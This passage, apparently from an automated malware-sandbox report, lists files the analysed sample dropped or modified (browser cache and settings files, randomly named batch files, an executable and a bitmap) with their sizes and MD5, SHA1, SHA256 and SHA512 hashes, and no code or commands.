7ee1d5ea1254a0b21269d601e06f3bf3b59a67461ff60d7a9ce467d4b7677118

SHA512
3a5aaed81d02b7e267aa455ebd7e43c4d1fc75dd8e4466d97b557262a91b6d1146b04bf81dbe24b8f8112e4e2dd43a8eef81470bdcaf9c7c9494ed7a979d9acc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e

Filesize
432KB

MD5
fd28bee559b945c80e996b181569738d

SHA1
3477a5028e28813bf46ad58e02590fe68b9013e3

SHA256
e9903d897813ca48d513f73492cabe653f35e570ef162ad63cc0dafdf89d8e59

SHA512
24ab180308f1965a642ce7c4ca7ec68ff7c9cd7946eb1729f25f4d7887934fdf2531b328b203e57c1de7afe38050692f35d42c1768538cb79d35fd251ac18586

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000015

Filesize
31KB

MD5
b2c6782f7e76f372b863cc9fd0d5054d

SHA1
8def1f409ea7b6a156aa8962e6fcc0881156224c

SHA256
e68e065e59a53f29e3b526571fbeed222ee3b2bba339fe6bb62937d22b1ed921

SHA512
6ddc38faf0e81b3d076c5652ba87eea04f331c0945023e60027d9f306333e025e175d2e3cd075abc246c6b0d2f5881064f06b8f50fe48311b8724b1fdedc71e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000016

Filesize
43KB

MD5
b539750fc23f45ce7fbc0ba9a51712b7

SHA1
af0697e0ce72e79418473724d6437e51416a9fb7

SHA256
52b1efcad1848cb3b9470a5ba9e224114448d5f7a922cb153ecb7572ba16b996

SHA512
907636c7289b8617c8fb16648b3533e26fceaa6bc9516e2ac6dcfd270377e77acb2c01ed24096ef61b7468796c1e1fe3fb6213d91c7ebb01f8dcc8b2fe7f43fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000017

Filesize
20KB

MD5
a073983e44a8e227f7affd4f53fecd60

SHA1
0faa664fa6d01739dfb5926d29a0c1105637aec9

SHA256
123c9b01530e0ef6afa769c38be5168c762884293935e402ffa8d4d98232e9f7

SHA512
ec7627a63f6a92a0279ac733900890a2442e269f5ea97f6d649a52e02049a88efac6a7868346b3535f2915169db39a80d186fce3e1e4f0728f8a5c7a5b2f3338

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000018

Filesize
37KB

MD5
3d6549bf2f38372c054eafb93fa358a9

SHA1
e7a50f91c7ec5d5d896b55fa964f57ee47e11a1b

SHA256
8e401b056dc1eb48d44a01407ceb54372bbc44797d3259069ce96a96dfd8c104

SHA512
4bde638a4111b0d056464ce4fd45861208d1669c117e2632768acd620fcd924ab6384b3133e4baf7d537872166eb50ca48899b3909d9dbf2a111a7713322fad4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000019

Filesize
38KB

MD5
71d3e9dc2bcb8e91225ba9fab588c8f2

SHA1
d7e38ee4c245f64b78eb18e6ecd7b9f53b3254a8

SHA256
ae99aaede2f373187a4fe442a2cb0ab9c2945efbab01cf33e01be517c0c4f813

SHA512
deda05ebd575d413aa2277876991ecc2ea238907390753485ba1b487ede2f432363c46daad5f3f240eaaf8d3258150829a3ae3d2d9c420ea59567cfd440361a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001a

Filesize
137KB

MD5
7209f284854b7ea1e5642c91fd2e43d4

SHA1
4f3e2904428778c247fee4bbf39dfefb45234370

SHA256
1878e1d962faa07f1e785f5be4104bfab3feb6112a66d7bdcae1fe2524e8e4e4

SHA512
fd8f15a12102b842f28da5a2f8d2eacaa0600459c6d0df415ac7e43cea0fdb359cf95bb2193695cf6169eca5157914d584c694514f9498ade833a49da67ce3f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001c

Filesize
20KB

MD5
4c5c44b734e3f12fc4d69ad0ef9de0b2

SHA1
49cfccbb4d4a17be7f4d93fafb0c6ce7e28389a6

SHA256
f1e46d6dce5cb2bd2f69159cf4d91f052033629d9f3cd29594ee05ac2dfab2a5

SHA512
65e73d2a6278d54e8d6b76577ebcf46accd6cd870c33342774a14ecc15266259ea1ac3797379d103fe9a8ca2daf2a05e5686ec7b783520a3d4dd00883b93c386

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001d

Filesize
76KB

MD5
44bcbc15dcde5ed0fc6428e600531a97

SHA1
d8f9c66006182636bae8b97e2129cff69bab3d41

SHA256
7745990493c35c5696ef21475ae7b6753e4c3736466819ffd8a04a0ed45b1431

SHA512
6e3a42f8a5470c3d1cd8be07410ed396914a129a7bf8bad6b2a5afb2b3bbd9199fdcaf3aed57e37fd99044d33e86f37ee6ecdfcc4d35a42b44ce08cb37ed84b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001e

Filesize
43KB

MD5
05fb8f8991f2c79721c71285bb6863cd

SHA1
289fcc339daa8f24f432b6d8d78e776566cb4cc6

SHA256
c385d866c78cf2c91ab9dc834291fa49f806aa0805840ebf3bbd1b41e33f55b6

SHA512
65c793b5e1f772f6714c29f0b041e38965711a9828bf3ed1ef40516d841b924b1b192f9eb02186025abda84eec5c5fd15f65b335201d9f7fd2cf2387cca394a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001f

Filesize
43KB

MD5
af0fd092a950cd858a160490ae22d16c

SHA1
4291c81c52514932f517529f3d3c24f4a40609ec

SHA256
858b70c0b816c651b12a0849e17c83eae8a76aade2fdf02e98848d5d25868c82

SHA512
64123d00581d6d45c1fe0390911e20fb732a9875eebc667c45ca4f84e5768657bdb1fa9a307c150d6e5644a7e8e5cd274c58f879fe059b8c6e1dc73e2a039b35

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000020

Filesize
17KB

MD5
c3e277cde34797fa374df42b70a71588

SHA1
20169e9c9e7503f8bada9e9a61a28edf6d86121d

SHA256
85d9b7afea9afda978980f6413d0fa7d76c058d26cc400ef4908d4f2d685dcec

SHA512
5e2f4039c2881fd6c43acfb7d7626a38659c5763c03cbf8478834b6481b0d4cc5b4164c6601c8c2ee5e30bc1e2d42009a21bb9dbc27870d648b33fbf351d0466

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000021

Filesize
17KB

MD5
93d2406851bfec7cfbe6ef9c8618198a

SHA1
cdba3325b443d6dbd03793ded007fd5c4ae87c47

SHA256
2cc7de4bf792171644243f04a0413007696a4dcd830b878bef01839ae592e6ce

SHA512
484dda571d4b9df77e0a15b3f3f7acfdffaa9e2b3ff09889d6a1d211a55f36022f6250ee59c8dde67e262e2e9c7c6f3e2c7ec1811786fc080b6ca189731dfe00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000024

Filesize
130KB

MD5
8a111440400ee48965629c261c08ab5f

SHA1
3c888816389c57c496df8115aa5a11426315ca8d

SHA256
839937a927fd16fd7cdbec7b01f997d04c363cc0a25daaaeb6c2acc749a97bcd

SHA512
5b200748f2855e3ac1fe6527171ed502ea351454e796972ee8d454c530fd8838c9d0b7fbe250901d8cbcf817d872af4400f7ac1621266845fba0c1acaae25271

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000025

Filesize
43KB

MD5
22898c3b88ef29da6a41c302510f28b4

SHA1
f9cc37a5977f1163068a0a73d289ae2431a7fb82

SHA256
29bf369dc4c1b989f933e482f76b961acc5478bf48800547b18d6cc6b9b9dd91

SHA512
f270ed67a28469b36694a7600187a07ab8fa82877d3a52bbb442c6344091e3ed815ffec90238605fadba4685dad0f5ef0fc9145ead8ff38ed21969a4f6a5ef72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000026

Filesize
118KB

MD5
d68a12eec7bc3c2298d2ae8dc314e19e

SHA1
93b4f5bf89a8fa5ec6e39c3a86e08e5472016c99

SHA256
a5c311521985de8acac2b9f57e730277271fe6a499f1c50504f67ad6eb5ee4f2

SHA512
b8847c92510d5e1a4402532f10b72e72333150cf660a35f9c3dc2412aad7d0b9bdd6c213bdb8820fccb2da7fd292ae7b82418dcbc3c9d844b41b84033acd8d48

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000027

Filesize
234KB

MD5
365344c5e5a3d91d1e8b036f3ca8811f

SHA1
90c81771cb8207fee85065746d94c9a0d5ba609d

SHA256
e99bbacd9f05014b8307ba309f2e313f267282f68d8964a25782a54e0b2816f6

SHA512
9b75e822af9be8d27de29000d53a80cc3fd6c723286990acea61bcc4725289cf27a70a97e0004d440b21dc060fc0ad4fc26427204649c2392fc0e26b2da5a593

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000028

Filesize
224KB

MD5
12e71bfef07f200ec60b070a4ee3aab8

SHA1
32daddbc796b736140b6b6c0b2dc574a85a55090

SHA256
ff890be56db0b0e98609a5111d1b393b1ac689bb89e5cdcbcb63b25e507d61d8

SHA512
fc4e9f6efefe5a840a0b58929532063d1c752234889661e14da98a635734d4a08a6831c24415d5db3d9cda861dea67aecdeed15b6a4c547e2a652c8dcbf0a99f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000029

Filesize
38KB

MD5
f62e96a264164316243d105d7e446dc0

SHA1
b8be4dd8883e65a8f456821a10e6073571e7bc8e

SHA256
8769e57f09434312aa96ac08daceb1cc2683ff0652eb035d8ca28932096d63d1

SHA512
08d1a652449b6f109f83ece0564ceed1672eec04275df6cda60e32d5a9047444acd4b9e8b3d3970994373d6f819baa4d0730786273b33383109f634d9a02a1d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002a

Filesize
85KB

MD5
94095b93d67fcada163f653f00b0ff3c

SHA1
434ee0f7c2b6e2c9762bf64a0b553cdb4c204a1f

SHA256
feb2615c125f79b9da4680f0571c6c68ee263cf41c0f4ca2d28e07641c48463f

SHA512
a412a12cac2a8947bdc87635b7a52374fab810479109cd54d61cf7de2cd4c7223dc2f26f7e6de921723c255449eaee447009c8c2a93cfe7e182bfabe3c2f6338

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002b

Filesize
45KB

MD5
783270be2c82352df7dea371ac9f3057

SHA1
652d1e93caaa7f20b458a71e18e6616e8ff68dd8

SHA256
df16aa63763c7c224e76ee603500705d3b2ca276ea46d236131fc744a76bf056

SHA512
fc6af958a3ae328386cdea85bb7c9af9d7b86e5a12d07e527dd484a31ef853a3903f60ffd9a181e3a60f21af6d7fca85dedf618d4d73bf6a56491d08a44a8abc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002c

Filesize
42KB

MD5
409fee54da01edb6597f55df853b2820

SHA1
1b13b8d79c77d9825f0f604560dcf364d66ea996

SHA256
2d7d69fd3b4b6efa9e0defa4f734ea1fcab62af8e7ae52f9f0c1238e8066fd7f

SHA512
468b16418f5191bddaad28b8a849b72beed5119e6af13cc659fc6b335b4591f58e003d9d3694b321c5bb679971ccffbb9ccd369ff4be018735cd7f06dabc3f4a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002d

Filesize
16KB

MD5
bef9212e8e6bcaea19ba91d8c3b2ce3b

SHA1
90b32d7936d3d819aae82e69149874b6490ae4c7

SHA256
d1ab046c688baa0f752121ccb942537c3d3b8beee714aa85dea382e4ca0e8442

SHA512
1e7bb9fe596e16adfdd8ef5de18e1291ba3e7879c457d81132429071de0b4eb541e7d0d1ecceaa973062964a2f91ffa6628204b503e426cdc187da8e0eee5a4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002e

Filesize
49KB

MD5
5830cc90c4a89fc007a7e16967c68620

SHA1
a51cf6b080404ccb56b6ae99b1da29b12f13f2fc

SHA256
05538c87fc381af997db2892fde97fba05fb0785f0ef5655620bdd1b4a675a7d

SHA512
b1b749f97f48877a0e494aae0d3ed643d7e12a241774df04b70a4813fb9f3a16780ccf7588e26e008a7df7177300a4b112b75cf026ff23216d2db4df9ea9850c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002f

Filesize
27KB

MD5
43d988b8e989f6ba356ecd58a073325b

SHA1
56a08bd0052196fe7f20b11164bad7b80c1e37fc

SHA256
2a0fa25de1fb6c8d20c29becdfc3d474b9596dad79a8afcc01f0e3fca5989c2e

SHA512
57f2450372892a00469a8e0971b3de0eb98b5ec82e40dde446316c5a29a292bebfb761392d5b0bd0031068c579479076b45fb7ebf3e442096066775ae55b5dbb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000030

Filesize
50KB

MD5
fe241430a7d6a0d1bd6dab90a6ef2b7e

SHA1
7bdf441fb9286ded3075dc5b2516c99887c8e188

SHA256
9ebe3966e8235a1d1261b2ea49056cdb2a1affcab0b330e3c56fb48cc02eff19

SHA512
78a78ef8266a5ecf4c5f99b26c5aa1ac1233cff6e82b59520a63bf4c9fa7dcca25b8286a732b2dbb9a8f4eb81c2eb6a876005a90d7ce336302c3727ee6c71f30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000031

Filesize
16KB

MD5
2f079837ea141ff40d34a6f750bb1706

SHA1
0127b0b17d38722b6e298a46d93207f3b5c146d9

SHA256
0d139e354c8441cc999802bf29503393b181fce3199c3ef317cb40c9a79b594a

SHA512
91a580ea8347be2dd9e63afdf998e54b1865f543f0500336e35c988f980717bb07cda710678919bafaf8d57ea7b903679cff41688762a2a6e44972c0ab349ae0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000032

Filesize
37KB

MD5
8fed7ef51826e36155eec0cb008bf675

SHA1
0f1dc1d7f1ba765d1c7b8673d498cfd9e86c2980

SHA256
6cdadd30df71816d23f99f455ac9c18b9c039b352aed6db4c56cd55fd00b2916

SHA512
8c495a11cafaa5732e8ae2c646c76b750730b53054604fac5be72bf8ad7cd962cc9ffbd76756c07bfd9612617f90eb4eec93d749a61166a263cdc86ddf22c686

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000033

Filesize
87KB

MD5
e4d10434825363a6b58ace83381abd36

SHA1
d40ed1bc64fef0f66429445749cf3edde33ea3c9

SHA256
85b40a212ced2a1cc7e67af3592e3a34b13ed50aad068cc9544863752ecf5b48

SHA512
34b9f7130329571defc2eef4dd7db05dc4ca4883c5d01d44fd735c12a6697906fa7bb4a9699aa9389959b0378bbacc07a0a47a1dc297cad13d951b2d9ee3f62a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000034

Filesize
28KB

MD5
8b6a23605542aa5ed08ecf170cc061f2

SHA1
be7a5b58e9aee7eb2d36927b4dc2f0610c3c2cd0

SHA256
138d0a55989a81aede9a115cbbf485a3d91140cb1cb98480358d17c644d2c8d6

SHA512
27d0a5687b2e3c49337d6bf7a46aa46e48d72a4c3e6f5ef810771217bda4a2feb60b002344e26cad2f1700eaddd92f41439a04858822617ecf77b176fc27fd13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000035

Filesize
66KB

MD5
b90820c9563c1e92a9d8ab248286dc8a

SHA1
6355d61783af3f59c00063b4d957a0215ca0a796

SHA256
232778cea5d4fd1b12ec294e48802fda30f2440b74a20860183da05d00099c7a

SHA512
3aca812be8b4daece355ccd97bee64bcda04052d6a06b210b0a4f6e7108125f3d1625667c6e026859ff417cb20f5f42814df6d8f9e446b2c4fa25a1484e70ba8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
1f3dc8dc7b175e9f03c0c5f7db493ca6

SHA1
a7eb99543afd02e266ca8eee897bcae3de784a4d

SHA256
4b740f0bc2e07a310cef20dc06961965f735958df1db865205c18a6828ff56e0

SHA512
5e7bf66a8dba9dd84c74b4601395e6e7f1e5680beb226080bc91d693a5ae29a39b5370a73d217814843f8a4e9cbd001719dd3ac5cad6c57a0e73202c7ef50092

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
144B

MD5
df8b5a4dc9b3df94f27390207a033b30

SHA1
d07f627149958e5c8f95851341ad03909bdc4fad

SHA256
0a93a0052a470e22b3b9125fc4fe0f564885f20264285457d37f97ff71d389b7

SHA512
0567c9e3e8506f3f8ba1fabcd61759618eb7e4da6d9131b761930242441141768a6a38fff6fbd4ff8813c33755b9c2a62eb3001528d1d37c1de2b0a27323de01

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
c858e8dbe2490aa902a0d8aed876bcd8

SHA1
22e57268ac150e4cda0db56705cc9e2d90e95306

SHA256
6c5c38a43ef88a7b0054abd1ed444ef2dcf065caedc25db4dc79f0182961721a

SHA512
b157933bee66e668f7adde9d57c965fb41a839bcbfb541a2cfa35f51b586d954211fcf6a1427545c9607fefe842277c81662bd46962f15f7c6d969e220051a43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
98fd046c7004bd662ad6931bc9ce0de3

SHA1
439cad68c7ba2154a9f267ca63efa3d1a290fd37

SHA256
61203aa0e4f90deb77d977cfdbfa538c3aed03131533d5ea03c791ce6a9b1737

SHA512
1f806f21a6898fe91337d51bb9f87940b8eebc507ab31edd5012db48e051c7c8d6a87d4fe45b267b10e632f00df7b37363ca217fe696246e9ef4005c7e687991

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
bb37e2235b2bfa9bca04d2e4b07cb19e

SHA1
8dcef4fab5ea83ea09c4166c71b700ea3812c906

SHA256
1e68d6be32756cc2669a31d3974f4d5eecdf0566e8672603d6d50ee36cff5b58

SHA512
420b793d2c6f6a22437a35191cb6420fcb75662af0d03a62695fdad74a8c5da7f3325a076b8665ea7f09d723c95bc5c61a6864c6e3deb45dbdb07a68aa7f10ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
10bcc6a10ac27ae419cb0a3be8550051

SHA1
7a7bb3d610ca339294d303851e09d317794e4a98

SHA256
1c9da4f1d5e05b46941d9904f1637bf61954a21aadad3069bcd570c2f980ca88

SHA512
ed2556362163e3bfb89fb208098f4fb72173f995081c79083b3584d8224f396a0ed41c46cbd969d3bb32bce4093c3f17664cf9a2a82aeb07f176338d1157c351

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
27e06a327efbbac362bb3d2294d47d1d

SHA1
eabea765ab25c4610ff5f2846b0d94056735f8ca

SHA256
20d1b8bdb92b87570f412f421703958e98073f660b45b5ea392c324bf5a2582e

SHA512
f3594914c85779b8ce09071690881cc0f2dcc85d7906f6cc684cfe90560d634df2c3e8d35ecf9e3ca4950a62d2e0623a22b119a50d8a05aa5f4fac1e54bef454

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
58a21fcb037021b77afadb7e643e4786

SHA1
ee875c3398a34c7e05855360429fcf5f71dc3cc2

SHA256
dfedfe2a2e95f291516379ac09678d5494d74eb45622b4e7b8bd9206f2f0197e

SHA512
44d398a1fed8853e2b9080110d9fb84fa489d0647711b47b6fedb5d692182f14a1b41ae81715618b8c19282fac5d5c76a0038293a4e2b6ad45c8a552a441f5c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
736c9df4f232a4b7016f82cb923937a9

SHA1
08ad74f7fc51c54e0efcc0a610db325302fcd361

SHA256
8e51dbc22b34bf1810f8b909f09abf696ded0f210ecd715892ed3680aaf3f4ff

SHA512
36e596037b57996edd53deb723f26dea59fe2524c6b5f6401ed9783e29c986fc410268f934bd26a9e0d7c1d28d30ad1319fde09edce1161091a26daa00737add

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
c909074a6c318e50f3689839913ac342

SHA1
64b8c9bf423d8d8b460b3750858f5285e35fe2e9

SHA256
b3d4e780660d7464e206e099c579e4eede8a1d9675821f79c4d5838c6ac24457

SHA512
c22b5b8cfc329b7df364adec301e3dcbef12bf982a37ef4a6f8488a943b9248ddd427b24b296956de5a99a780afb460fae9d0d849524b611ffa711341d75ea52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
55408843271944fbadeb01fed821daf6

SHA1
451bf0ad8139c3d02e9e45c069198f3afd3087c4

SHA256
139557ac000fb192219c10e37bf061feabeafc29b9c55cf6d9c753e67400a9e9

SHA512
88c8aff53cadc83c6e0b2a9de6df41febb2f983fb755870f42112e30a14f15871e6f653c283fc847fa21d7c6e422aea95457ebab9c667360859508fd8989cee1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
8d296dc8ead0573c36a5ffc702d06225

SHA1
818d5d8b9b9facf9251f850a563f0c4f4060aa8e

SHA256
876a329f09d90ce76d393d4dae0f68ac6a8d3b4803699a3df9818ce63d2cfb4f

SHA512
8bbe27382b45542dc9f68771c6ca1ebef7ad0fbd21343993108b4c5eb93ff9408fa391c43728a17ec6a81e329123bff7906c4b486f4f72c0b21aaa89e504e4af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
ce0a5774ef6e93bc9f156eb87334abfc

SHA1
fc6ce4a04c40aa0d848046c9c9c8b75c0abefbe1

SHA256
aff02268370787ca9b3707297888766753bf81ea9c476e344f04e4602e8cd1a4

SHA512
8e1e0bd51cf610d5a8394e5174f0645a0d262afd7440708095518db1d436aa73d5b934014076f8404dd094eae9ea6f35f9ddb2c6bd8412e63311906687836e84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe586d7a.TMP

Filesize
536B

MD5
8d8d406fa226835b9d064a7c9ef748ec

SHA1
e9e535247e7787e61eeb588ae6e49bb7ea06b901

SHA256
b32a0b199276e7981ec37227fa6e9c48e7da24b2995bde1fc6ca982764fafca9

SHA512
78ea8a9ad3cf85be8cf6a5800e3d6deeacb3481e0b321d8fe726ebc4163711435a2217a50cb30572dfd3423fd168d4e965f222db94af2383cc4900469a80e45c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\da91f380-8a2b-4bb4-8844-d82dd1845a1c.tmp

Filesize
2KB

MD5
98e1ab16c6d79f792afdbebfe8d5cda8

SHA1
09d39fe4ace0c3775c7386990e74e38da6d62b7e

SHA256
b759e2d53832549c980bf1791e9861b8affef07e58181ff2856be11cd024b21c

SHA512
192f9eb7d6ef3da798b1fecada71e09b02f1f4236c309579fc69cb24b33bddc39a197fb87fb66c13a317108779c474a027dce132ddc9c1a13b6d534b39e40be0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
6afb0fcbd285ba62ec75265444fc0edf

SHA1
0974532ac45981b438e326e88f79ef7364b45422

SHA256
4339a048888ab1fec398bd1faed151a6164cec3eef24f5086d50df771f758e2b

SHA512
fa35dc42d39c8b3ea7203b44af66dd72a1551b791109de918116033b1cb35aaf1ad7e0fa766e9088e7050b721237f58e6622c951342e01f03c8ff040e583da9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
9f9f6392fe7eccea82a9dd21b3f7918d

SHA1
d88a3064a93b60d631ee0c3cc17ce6a456e3b710

SHA256
7ca4ce9bc6bf85bb0a302d9544f9a4038d53b96f41822d175f04d3d205d6bcbf

SHA512
bdb5c4a19990200428252db4642471214e1e147a8bdd0c367afae6ca919fca580e5174c530ae0fb6907c36ee80a142fbf536c92913fd54d34cf961c6ad69e4c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
e26f97d2233f14ef6016d9e8770c8192

SHA1
bbad8e378eb7ca3e831f3107789f5bed687868b7

SHA256
37614cbd5f3d8edd95ab999234daba43096d35d42645aa42e77ccc466eff4432

SHA512
8a3c62eb04ba36380ec5ef1a407af012b0478e3c731f035509bd60773c2dc88f363108675eaddbf5361b517217b27d94370c9f4a99413998a77d0467fad5e695

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
37969a22c7ea164445698de3d940868b

SHA1
6fb055e6ee6226ed8dcca2df6ece3b7caff582a2

SHA256
40c08d2b33776842f0a3b8b40de0293b59669d57bad1d03eb738c462e914cab8

SHA512
b56e7ff372c7e2cd3410e05d13431c49e933d54fc5d09ffb3c880a8b1b6c340f641a381912518d32334b3b47e58e30c0f0173d7543833d637bb91657de2448eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
a33044cc94e848fc0fe21cdd7c64003c

SHA1
44c4377383fcbe1cfffa2026e98d7cd8874040b9

SHA256
e1fe85ddb09d7b740ba4a3adca5a6a8554964e171a5836557a4dfa0e56dd5e06

SHA512
287feb58c19949bd78ec3342666ffc784b9da9a208f6e4e8a301ae57b5d7766c2035870c23734d545a2e27822f514f844b059744067602794175035b0540e0cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\1iphg2tV82MV.bat

Filesize
196B

MD5
5ad49aff490559e8bd3a008d8e39cf26

SHA1
c7b1e6f1341ee93f86a562ff335b553fb346493a

SHA256
5b4be6f6bb8db096274341b269ec696d64fc7095d3ca2cdd040a3c88804d8710

SHA512
c753fadf6b307f9c7985e6d27cbb53d628383e98dc5a8ee6eb2a85fc3dea0260b37d5fb0817820174673c3990d6be535527083eaa03b5447e29cb882092f8026

Download Submit
C:\Users\Admin\AppData\Local\Temp\3vQIGCTm5CD9.bat

Filesize
196B

MD5
bb60f4df1f5c4705235e45c4f0ecc81d

SHA1
99b66f7ab79b7f92aff35736b8aba5cf4f755435

SHA256
7d1808405fe4a9569be1b50c78c369f0745f5235f87901fd60be105e8b7b33fb

SHA512
796674c366f152636141f4387a7a3e1827091805de449358f5ef1f8c195e1ad8aee8af00c86208ebe6ae15041a6032bea2cd10aa0ad70cb313e210ecc3b48b25

Download Submit
C:\Users\Admin\AppData\Local\Temp\CvyZ04unJMBd.bat

Filesize
196B

MD5
16dea68db3c05078c2b66f267203640f

SHA1
355cca839e748b247dc39c8f1f430e7facd07350

SHA256
c1bd2f4e51527aa69d5c5bb9cf1ff41d60ce0914342a1a44c1c2be2bb6c81b08

SHA512
81f20d67777e832a076949c320ee3bd23924318d66521282d165e17fa349fdff5159dc50773bf5849a3174466079f6e6c839f816d869b9807e44d11fcda9cbd3

Download Submit
C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\better.exe

Filesize
3.1MB

MD5
47ec64e3d129b23c44f417cbc2a07aa7

SHA1
e65fbcf69e6e808ebe7bc9b13e483c5fc80d5fa2

SHA256
ccb17adb4b57a95a61acb010c01da98dc150be67a85df2ab40ba9d1f078f8373

SHA512
52247a235b708e98efcf977fd109344e16df9c5a9f13ad5afd395df3f009d9ee6edf81fef9d74a31a9fdec1f851e61642912eb9bc8384b39042b70f9d8b7d510

Download Submit
C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp

Filesize
3.2MB

MD5
fc5f6d462061e809d76ab228eb9eba98

SHA1
3b49ed50837b5628c05c98962aad9cf1e7d2358c

SHA256
983dcd7918ade4648054512be29c9e06dd83f147948ddd6d98247ab702860345

SHA512
8f430adbab055cb608880c4fbe8e7681f3ac51838cfb2750e0d6aff1530bcece93bc5ff176e656512c454debc1cf8e1441af536a0acee39eb2d6bbe70237be81

Download Submit
C:\Users\Admin\AppData\Local\Temp\c0d2FGEivyf3.bat

Filesize
196B

MD5
c547ae98093d6d2793b763f6078fa00c

SHA1
a7ba6a384a06779dd6c8caab0d61dd9460c67042

SHA256
660db69fbc306cf0c56e9dff3d7dc3eaf234325d961b1cf5f414be6a8d13285e

SHA512
3019bf3303e17c3d15f5c74269450e1734f07fa22562e1d5beb652538a6e0c57800e07ccd1db2614a4b597b608c91e94c4b7cc8a4c42dc6eba5b026a575ef729

Download Submit
C:\Users\Admin\AppData\Local\Temp\kms9ww0RiS6q.bat

Filesize
196B

MD5
7efdb71fe311e99b518467b4a4bfdaad

SHA1
ca127dc4695b4fef12ae4b1f893a9beaf2ba3228

SHA256
e138181aaa25f65ebbab0fc8808a347cdfb4f03456cf862b6e8b35032e384442

SHA512
